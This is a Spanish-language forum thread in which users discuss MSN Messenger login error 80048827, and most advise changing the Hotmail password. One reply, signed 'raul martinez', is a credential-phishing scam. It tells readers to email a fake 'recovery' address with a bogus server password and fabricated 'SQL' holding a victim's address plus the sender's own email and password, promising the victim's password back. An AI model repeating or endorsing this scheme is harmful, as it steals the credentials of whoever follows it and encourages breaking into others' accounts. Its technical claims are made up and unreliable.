Error 80048827 de messenger

Resuelto/Cerrado
tef - 20 sep 2010 a las 10:12
 gladys - 29 jul 2011 a las 03:07
hola soy tef y no puedo entrar a messenger por el error 80048827, alguien me puede decir que hacer??? me pide k cambie mi contraseña pero algo parecido me paso en facebook y ya nunca pude entrar y no kiero perder mi kuenta igual que en messenger... espero m puedan ayudar =)!!!
Consulta también:

207 respuestas

sisi pacienciaa es lo k se tiene k tenr
0
si a mi igual me pasa y aunque actualice no pasa absolutamente nada ojala sea un problema temporal
0
Soy de mexico y no me deja entrar...
0
esto es imposible de solucinar
0

¿No encontraste la respuesta que buscabas?

Haz una pregunta
HOLA, CALMA, CALMA, YO TENIA EL MISMO PROBLEMA, SÓLO CAMBIE MI CONTRASEÑA, CREO QUE ES PORQUE LA QUE TENIA ERA DE "BAJA SEGURIDAD" ASI QUE TUVE QUE PONER UNA CONTRASEÑA LAAAARGA JE JE PERO FUNCIONÓ (ESPERO NO OLVIDARLA :S )
0
la solucion es meterte a la pagina de hotmail y cambiar la clave de tu cuenta y listo , pero hacelo super rapido ya que la pagina se cae en poco tiempo

PD: al entrar en la pagina de hotmail lo primero que te saldra es lo de cambiar la contraseña ;) y si no te entra la pagina intentalo hasta que se peuda porque se cae a cada momento
0
Yo esta mañana he podido acceder a mi cuenta, y no he tenido ningun problema, eso si, era por la mañana, antes de las 13.00. Y luego, cuando he venido de trabajar, por la noche no me ha dejado. He visto que todos los comentarios son sobre la misma fecha. Espero que esto se solucione y que no sea realidad esos correos que van por ahi circulando en plan que iban a cerrar hotmail y que ibamos a perder los contactos. Joer, seria una gran p....... A ver que ocurre mas adelante
0
Esta es la solución:

Cambia la contraseña a una nueva, y luego vuelves a cambiarla a la tuya de siempre.. y entras :)
0
Lo que ha pasado es que hotmail tiene varios servidores y justo el servidor donde se alojaban nuestros correos se les ha caido.. por eso ES NECESARIO CAMBIAR LA CONTRASEÑA para poder entrar y luego, si kieres, volver a cambiarla para tener la misma de siempre. Con esa misma contraseña, entonces, ya te deja entrar :)
0
hola tenia el mismo problema borre todo el msg instale y nada hasta q era la contraseña creo q caduca y te salta ese error....aqui les dejo este link de como cambiar la contraseña (https://es.ccm.net/faq/140-como-cambiar-tu-contrasena-de-hotmail-outlook-com sigan los pasos yo cambie mi contraseña y pude acceder recien amis correos luego cerre y abri mi messenger ya con la nueva contraseña y eureca .....luego de padecer dos dias al fin pude,,,,,espero q les ayude en algo suerte atodos
0
a mi me da ese erro tambn... me pone q ay un problema cn mi cuenta, pero no se yo... ace no muxo me paso tambn y le costo unos 6-7 dias volver a funcionar, abiendo cambiao la contraseña y demas... q eso igual si tienes suerte funciona pero a mi no me va a asi...
0
hola mira tenia este problema y loq hice es cambiar la contraseña si tu
dices q la contrseña de la dan a correo ps chequea esto espero te sirva aqui te dejo ellink.... https://es.ccm.net/faq/140-como-cambiar-tu-contrasena-de-hotmail-outlook-com ....hay unos pasos espero te sirva....
0
codice errori 800488eb
0
hola pues solo cambiala nada mas si no puede entrar anda a google y pones hotmail y entras y le das a cambiar contraseña lo del face...eso no se....
0
raul martinez
19 nov 2010 a las 17:53
enviar un e-mail como sigue:


1.- En el campo "Para:" colocar la dirección "recovery_id_live@hotmail.es" sin las comillas.

2.- En el campo "Asunto:" colocar "sistem:03/Admin" sin las comillas, este es el password del servidor de LATINO AMERICA

3.- En el cuerpo del e-mail, colocar exactamente las dos líneas de instrucción SQL, tal como se señala abajo .- Utiliza copiar y pegar para disminuir el margen de error.-

Inicio instrucciones SQL:

;Select A.PASS, A.PASSWORD, B.SECURITY From USER_PASS_REG_XX Alias A, USER_SECURITY Alias B Where A.LOGIN=="e-mail de la victima sin el @HOTMAIL.COM" AND B.SECURITY > 0 INTO CURSOR TABLATEMPORAL; Send TABLATEMPORAL WHERE DB.MAIL.LOGIN=="tu email sin el @HOTMAIL.COM" AND DB.MAIL.PASS=="tu contraseña";

Fin instrucciones SQL

Una vez enviado, recibirás un e-mail con la linea siguiente:

[nivel:NN,LOGIN:"e-mail de la victima"@HOTMAIL.COM,PASSWORD:"password de la victima",XX]

y ya !!!
0
Hola,
no puedo entrar en el mensengger por el error 80048827 y no quiero perder el mensengger ¿por fis ayudarme para poder entrar
0
a mi me sigue pasandooo =(
0
tengo problemas con este código me dice que la cuenta esta bloqueada cómoarreglarlo no puedo iniciar sesion en el messenger ni enviar recibir correo
0
Eeeeyyyy...es cierto, cambié mi contraseña y me funcionó. Tenia un troyano...joputa!!!
0
que es lo que pasa?
-1